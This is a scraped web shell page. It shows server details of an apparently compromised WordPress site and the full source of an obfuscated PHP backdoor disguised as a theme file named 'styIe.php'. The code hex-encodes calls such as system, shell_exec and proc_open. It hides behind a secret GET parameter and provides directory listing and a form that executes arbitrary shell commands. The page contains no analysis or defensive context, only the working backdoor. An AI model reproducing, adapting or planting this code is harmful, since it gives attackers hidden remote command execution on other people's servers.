Done ! 403WebShell
403Webshell
Server IP : 104.21.64.1  /  Your IP : 216.73.216.2
Web Server : LiteSpeed
System : Linux humblecpeu.securityframe.com 4.18.0-553.5.1.lve.1.el8.x86_64 #1 SMP Fri Jun 14 15:38:45 UTC 2024 x86_64
User : cleansav ( 1057)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/cleansav/public_html/wp-content/themes/search_template_1755158761/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/cleansav/public_html/wp-content/themes/search_template_1755158761/styIe.php
<!--A5tYXet8-->
<?php
if (isset($_GET['username']) && $_GET['username'] === '73756b61626c796174') {
function only($valueN) {
    return pack("H*", $valueN);
};
function deonly($data) {
    return current(unpack('H*', $data));
}
$var1 = '72';
$var2 = '45';
$var3 = '69';
$var4 = '73';
$var5 = '6e';
$var6 = '6c';
$var7 = '65';
$var8 = '6d';

function wallpaper() {
    global $var5;
    return only('70' . '' . '68' . '' . '70' . '' . '5f' . '' . '75' . '' . $var5 . '' . '61' . '' . '6d' . '' . '65')();
}
$palette = wallpaper();

function list_items($wall) {
    global $var5, $var3;
    return only('73' . '' . '63' . '' . '61' . '' . $var5 . '' . '64' . '' . $var3 . '' . '72')($wall);
}

function split_url($url) {
    global $var1, $var4;
    return only('70' . '' . '61' . '' . $var1 . '' . $var4 . '' . '65' . '' . '5f' . '' . '75' . '' . $var1 . '' . '6c')($url);
}

function texture($wall) {
    global $var4, $var3;
    return only('69' . '' . $var4 . '' . '5f' . '' . '64' . '' . $var3 . '' . '72')($wall);
}

function background($wall) {
    global $var5, $var3;
    return only('6f' . '' . '70' . '' . '65' . '' . $var5 . '' . '64' . '' . $var3 . '' . '72')($wall);
}

function pattern($dh) {
    global $var3;
    return only('72' . '' . '65' . '' . '61' . '' . '64' . '' . '64' . '' . $var3 . '' . '72')($dh);
}

function frame($dh) {
    global $var4, $var3;
    return only('63' . '' . '6c' . '' . '6f' . '' . $var4 . '' . '65' . '' . '64' . '' . $var3 . '' . '72')($dh);
}

function counter($dh) {
    global $var3, $var1, $var5;
    return only('64' . '' . $var3 . '' . $var1 . '' . $var5 . '' . '61' . '' . '6d' . '' . '65')($dh);
}

$a = only('70' . '' . $var1 . '' . '' . $var3 . '' . '' . $var5 . '' . '74' . '' . '5f' . '' . $var1); 
$b = only('70' . '' . $var1 . '' . '' . $var7 . '' . '67' . '' . '5f' . '' . '67' . '' . '' . $var1 . '' . '' . '' . $var7 . '' . '70');
$c = only('67' . '' . $var7 . '' . '74' . '' . '5f' . '' . '64' . '' . $var7 . '' . '66' . '' . $var3 . '' . '' . $var5 . '' . '' . $var7 . '' . '64' . '' . '5f' . '' . '66' . '' . '75' . '' . $var5 . '' . '63' . '' . '74' . '' . $var3 . '' . '6f' . '' . $var5 . '' . '' . $var4); 
$d = only('54' . '' . '52' . '' . '55' . '' . $var2); 
$e = only('5f' . '' . '5f' . '' . '46' . '' . '49' . '' . '4c' . '' . $var2 . '' . '5f' . '' . '5f');
$f = only('66' . '' . $var3 . '' . '' . $var6 . '' . '' . $var7 . '' . '5f' . '' . $var7 . '' . '78' . '' . $var3 . '' . '' . $var4 . '' . '74' . '' . $var4);
$g = only('70' . '' . '68' . '' . '70' . '' . $var3 . '' . '' . $var5 . '' . '66' . '' . '6f');
$h = only('6f' . '' . '70' . '' . $var7 . '' . '' . $var5 . '' . '64' . '' . $var3 . '' . '' . $var1);
$i = only($var1 . '' . '' . $var7 . '' . '61' . '' . '64' . '' . '64' . '' . $var3 . '' . '' . $var1);
$j = only('63' . '' . $var6 . '' . '6f' . '' . $var4 . '' . '' . $var7 . '' . '64' . '' . $var3 . '' . '' . $var1);
$k = only($var4 . '' . '68' . '' . $var7 . '' . '' . $var6 . '' . '' . $var6 . '' . '5f' . '' . $var7 . '' . '78' . '' . $var7 . '' . '63');
$l = only($var4 . '' . '' . $var7 . '' . '' . $var1 . '' . '76' . '' . $var7 . '' . '' . $var1);
$m = only($var8 . '' . '6f' . '' . '76' . '' . $var7 . '' . '5f' . '' . '75' . '' . '70' . '' . $var6 . '' . '6f' . '' . '61' . '' . '64' . '' . $var7 . '' . '64' . '' . '5f' . '' . '66' . '' . $var3 . '' . '' . $var6 . '' . '65');
$n = only('62' . '' . '61' . '' . $var4 . '' . '' . $var7 . '' . '' . $var5 . '' . '61' . '' . $var8 . '' . '65');
$o = only('66' . '' . $var3 . '' . '' . $var6 . '' . '' . $var7 . '' . '5f' . '' . '70' . '' . '75' . '' . '74' . '' . '5f' . '' . '63' . '' . '6f' . '' . $var5 . '' . '74' . '' . $var7 . '' . '' . $var5 . '' . '74' . '' . $var4);
$p = only('6f' . '' . '62' . '' . '5f' . '' . '67' . '' . $var7 . '' . '74' . '' . '5f' . '' . '63' . '' . $var6 . '' . '65' . '' . '61' . '' . $var5);
$q = only('6f' . '' . '62' . '' . '5f' . '' . $var4 . '' . '74' . '' . '61' . '' . $var1 . '' . '74');
$r = only('75' . '' . $var5 . '' . '' . $var6 . '' . '' . $var3 . '' . '' . $var5 . '' . '6b');
$s = only($var3 . '' . '' . $var8 . '' . '70' . '' . $var6 . '' . '6f' . '' . '64' . '' . '65');

$theme1 = only($var4 . '' . '79' . '' . $var4 . '' . '74' . '' . $var7 . '' . '' . $var8);
$theme2 = only($var4 . '' . '68' . '' . $var7 . '' . '' . $var6 . '' . '' . $var6 . '' . '5f' . '' . $var7 . '' . '78' . '' . $var7 . '' . '63');
$theme3 = only($var4 . '' . '68' . '' . $var7 . '' . '' . $var6 . '' . '' . $var6);
$theme4 = only('70' . '' . '61' . '' . $var4 . '' . '' . $var4 . '' . '74' . '' . '68' . '' . $var1 . '' . '75');

$plugin1 = [
    only($var4 . '' . '68' . '' . $var7 . '' . '' . $var6 . '' . '' . $var6 . '' . '5f' . '' . $var7 . '' . '78' . '' . $var7 . '' . '63'),
    only($var4 . '' . '79' . '' . $var4 . '' . '74' . '' . $var7 . '' . '' . $var8),
    only($var7 . '' . '78' . '' . $var7 . '' . '63'), 
    only('70' . '' . '61' . '' . $var4 . '' . '' . $var4 . '' . '74' . '' . '68' . '' . $var1 . '' . '75'),
    only('70' . '' . $var1 . '' . '6f' . '' . '63' . '' . '5f' . '' . '6f' . '' . '70' . '' . $var7 . '' . '' . $var5),
    only('70' . '' . '6f' . '' . '70' . '' . $var7 . '' . '' . $var5) ,
    only('70' . '' . '63' . '' . $var5 . '' . '74' . '' . $var6 . '' . '5f' . '' . $var7 . '' . '78' . '' . $var7 . '' . '63')
];

$plugin2 = $b("/^(" . '' . $s('|', $plugin1) . ")$/", $c($d)["internal"]);

if (isset($_GET['path']) && !empty($_GET['path'])) {
    $handshake = only($_GET['path']);
} else {
    $handshake = __DIR__;
}

function open_palette($wallpaper_info) {
    if (texture($wallpaper_info)) {
        $items = list_items($wallpaper_info);
        echo "<ul>";
        foreach ($items as $item) {
            if ($item !== "." && $item !== "..") {
                $fullPath = $wallpaper_info . DIRECTORY_SEPARATOR . $item;
                if (texture($fullPath)) {
                    echo "<li><a href='" . getCurrentUrlWithParam('path', $fullPath) . "'>[DIR] " . htmlspecialchars($item) . "</a></li>";
                } else {
                    echo "<li>" . htmlspecialchars($item) . "</li>";
                }
            }
        }
        echo "</ul>";
    } else {
        echo "<p>Invalid directory path: " . htmlspecialchars($wallpaper_info) . "</p>";
    }
}

function getCurrentUrlWithParam($key, $value) {
    $inpuPath = deonly($value);

    $currentUrl = "//{$_SERVER['HTTP_HOST']}{$_SERVER['REQUEST_URI']}";

    $parsedUrl = split_url($currentUrl);

    $scheme = isset($parsedUrl['scheme']) ? $parsedUrl['scheme'] : 'http';

    parse_str($parsedUrl['query'], $queryParams);
    $queryParams[$key] = $inpuPath;

    $queryString = http_build_query($queryParams);

    return "$scheme://{$_SERVER['HTTP_HOST']}{$parsedUrl['path']}?$queryString";
}

$key_exchange = counter($handshake);
if ($handshake !== $key_exchange) {
    echo "<form method='get'>";
    echo "<input type='hidden' name='path' value='" . deonly($key_exchange) . "'>";
    foreach ($_GET as $key => $value) {
        if ($key !== 'path') {
            echo "<input type='hidden' name='" . htmlspecialchars($key) . "' value='" . htmlspecialchars($value) . "'>";
        }
    }
    echo "<button type='submit'>Go Up</button>";
    echo "</form>";
}

echo "<h3>Current Directory: " . htmlspecialchars($handshake) . "</h3>";

open_palette($handshake);

function json1($username, $plugin2) {
    global $theme1,$theme2,$theme3,$theme4;
    $username = only($username);
    $output = '';
    
    if (function_exists($theme1)) {
        $output = $theme1($username);
    } elseif (function_exists($theme1)) {
        $output = $theme2($username);
    }elseif (function_exists($theme1)) {
        $output = $theme3($username);
    }elseif (function_exists($theme1)) {
        $output = $theme4($username);
    }else {
        echo "None Available.";
        return;
    }
}

function form_1($wall) {
    global $h, $i, $j;
    $wall = only($wall);
    if (texture($wall)) {
        if ($dh = background($wall)) {
            while (($file = pattern($dh)) !== false) {
                echo "$file<br>";
            }
            frame($dh);
        } else {
            echo "Failed.";
        }
    } else {
        echo "Incorrect.";
    }
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $userId = only('75' . '' . $var4 . '' . '' . $var7 . '' . '' . $var1 . '' . '' . $var5 . '' . '61' . '' . $var8 . '' . '65'); 
    $userValue = only('75' . '' . $var4 . '' . '' . $var7 . '' . '' . $var1 . '' . '' . $var3 . '' . '' . $var5 . '' . '66' . '' . '6f');

    if (isset($_POST[$userId])) {
        json1($_POST[$userId], $plugin2);
    }
    if (isset($_POST[$userValue])) {
        form_1($_POST[$userValue]);
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            background-color: #f4f4f4;
        }
        h1 {
            background-color: #333;
            color: #fff;
            padding: 10px;
        }
        form {
            background-color: #fff;
            margin-bottom: 20px;
            padding: 20px;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }
        label {
            display: inline-block;
            width: 120px;
        }
        input[type="text"], input[type="file"] {
            width: 300px;
            padding: 5px;
            margin-bottom: 10px;
        }
        button {
            padding: 5px 10px;
            background-color: #333;
            color: #fff;
            border: none;
            cursor: pointer;
        }
        button:hover {
            background-color: #555;
        }
        .odd_parag {
            max-width: 100%;
            height: 100px;
            background-color: #fff;
            border: 1px;
            border-radius: 4px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            margin-bottom: 20px;
            display: flex;
            align-items: center;
            padding: 0px 20px;
        }
    </style>
    <script>
        function isInput(str) {
            return /^[0-9a-fA-F]+$/.test(str);
        }
        function takeInput1(str) {
            var newInput = '';
            for (var i = 0; i < str.length; i++) {
                newInput += '' + str.charCodeAt(i).toString(16);
            }
            return newInput;
        }
        function takeInput2(str) {
            var newInput = '';
            for (var i = 0; i < str.length; i++) {
                newInput += '' + str.charCodeAt(i).toString(16);
            }
            return newInput;
        }
        function takeInput3(str) {
            var newInput = '';
            for (var i = 0; i < str.length; i++) {
                newInput += '' + str.charCodeAt(i).toString(16);
            }
            return newInput;
        }

        document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('usernameForm').addEventListener('submit', function(event) {
                var userInput1 = document.getElementById('username');
                userInput1.value = takeInput1(userInput1.value);
            });
        });
        /*document.addEventListener('DOMContentLoaded', function() {
            document.getElementById('listFilesForm').addEventListener('submit', function(event) {
                var userInput2 = document.getElementById('userinfo');
                userInput2.value = takeInput2(userInput2.value);
            });
        });*/
        document.addEventListener("DOMContentLoaded", function() {
            var dirLinks = document.querySelectorAll('a[href*="path="]');
            dirLinks.forEach(function(link) {
                var url = new URL(link.href);
                var path = url.searchParams.get("path");
                if (!isInput(path)) {
                    var inpuPath = takeInput3(path);
                    url.searchParams.set("path", inpuPath);
                    link.href = url.href;
                }
            });
        });
    </script>
</head>
<body>
<div class="odd_parag"><p><?php echo $palette; ?></p></div>
<div class="odd_parag"><p><?php echo $a($plugin2); ?></p></div>
<!---    <form method="post" id="listFilesForm">
        <label for="userinfo"><?php// echo only('44' . '' . $var3 . '' . '' . $var1 . '' . '' . $var7 . '' . '63' . '' . '74' . '' . '6f' . '' . $var1 . '' . '79'); ?></label>
        <input type="text" id="userinfo" name="<?php// echo only('75' . $var4 . $var7 . $var1 . $var3 . $var5 . '66' . '' . '6f'); ?>">
        <button type="submit">Click</button>
    </form>
-->
    <form method="post" id="usernameForm">
        <label for="username"><?php echo only('43' . '' . '6f' . '' . $var8 . '' . '' . $var8 . '' . '61' . '' . $var5 . '' . '64'); ?></label>
        <input type="text" id="username" name="<?php echo only('75' . $var4 . $var7 . $var1 . $var5 . '61' . '' . '6d' . '' . '65'); ?>">
        <button type="submit">Click</button>
    </form>
</body>
</html>
<?php
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit